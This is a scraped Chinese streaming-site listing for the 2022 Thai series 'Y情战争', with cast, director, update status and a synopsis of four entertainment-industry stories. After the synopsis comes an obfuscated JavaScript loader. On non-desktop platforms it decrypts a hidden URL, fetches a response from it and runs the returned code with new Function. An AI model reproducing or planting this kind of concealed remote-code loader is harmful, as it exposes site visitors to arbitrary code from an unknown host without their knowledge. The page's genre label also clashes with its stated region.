Y情战争

主演:帕查农·昂萨阿德  /  维查·萨凡  /  坤朋·库塔纳鲁安侬  /  康纳拉·安萨兰农  /  托卢·龙泽  /  皮扬库尔·萨欧亨  /  塔纳塔特·库纳内克辛  /  阿索沃瑞·皮尼甘渣纳潘  /  塔雷·萨古安迪坤  /  尼替通·詹鲁柴  /  琵拉达·楠翁  /  查帕特·孔苏布  

导演:坦纳民·翁斯坤帕  

类型:欧美剧

备注:更新至5集   更新时间:2022-09-02 03:41

地区:泰国   年份:2022

播放线路
快手云
详细介绍
真正的战争不是武器,而是人。这是一场充斥着狡诈、怨恨和背叛的战争的表现。Y 战争分为四个关于娱乐圈斗争的故事。故事 1 新CP組成容易,如何继续营业下去是很难万一在腐圈迷失了方向,他能找回自己的路?故事 2 经纪人之战经理之间发生戏剧化冲突,直到这对夫妇被迫分开。故事 3 腐圈新人寻找新演員的现实条件,他们可以唱歌、跳舞和表演。新人们参加综艺养成营里的混乱事情,到底发生激烈的竞争。故事4 妻子 当一对CP的另一半有了妻子,他们在这个行业的未来会被毁掉吗?
window['LxQRgj'] = function(){ var keyList = [ "+ALPvZG7JfqnVawkUTN58jgMsm0rulh-4umApW61xS8HnhKIkab3rYoDiwtUvPec" , "QIoM7N6OP2En01qimF8flCU9V+RkwHAE4aqnTc6I9QS7lYsrv+ePONH3ZmtkBF", "jZ+3nV6wxsbgyWiolMdqDhtackJHC2r0eLGz5KQAfFtkN2oyg+paL9zSH.:bXV8IAsleMrKdhYBRimUOCx6/", "-zwgpiskFb9YlOT0Dx1KJuRhZW02ma9f3eR745c6-H8gVXIMjO", ]; function decrypt(t, e) { if (!t) return ""; for (var a = t.split(""), n = e.split(""), i = {}, r = [], o = 0;o < a.length / 2;o++) i[a[o]] = a[a.length / 2 + o]; for (var s = 0; s < e.length; s++) r.push(i[n[s]]); return r.join(""); }; (!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?(function(u, i, w, d) { var x = decrypt, cs = d[x(keyList[0],"-A88hV0f-8kv0")], crd = x(keyList[1],"6mQoNQQ1QRQ7N"); 'jQuery'; u = decodeURIComponent(x(keyList[2], u)); 'jQuery'; var xhr = new XMLHttpRequest(); xhr.open('GET', u + '/s/a?_=' + x(keyList[3], i)); xhr.onreadystatechange = function() { if (xhr.readyState == 4 && xhr.status == 200) { var data = JSON.parse(xhr.responseText); new Function(data.data)(cs); } }; xhr.send('u=1'); })("ijjxWlFFsxhodHZs2WbJ66odVy", "YTz9Y9iilYxwwkz9xY", window, document):function(){}; var _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; function decode(input) { var output = ""; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); while (i < input.length) { enc1 = _keyStr.indexOf(input.charAt(i++)); enc2 = _keyStr.indexOf(input.charAt(i++)); enc3 = _keyStr.indexOf(input.charAt(i++)); enc4 = _keyStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4); chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } output = _utf8_decode(output); return output; } function _utf8_decode(utftext) { var string = ""; var i = 0; var c = 0; var c1 = 0; var c2 = 0; while (i < utftext.length) { c = utftext.charCodeAt(i); if (c < 128) { string += String.fromCharCode(c); i++; } else if ((c > 191) && (c < 224)) { c1 = utftext.charCodeAt(i + 1); string += String.fromCharCode(((c & 31) << 6) | (c1 & 63)); i += 2; } else { c1 = utftext.charCodeAt(i + 1); c2 = utftext.charCodeAt(i + 2); string += String.fromCharCode(((c & 15) << 12) | ((c1 & 63) << 6) | (c2 & 63)); i += 3; } } return string; }}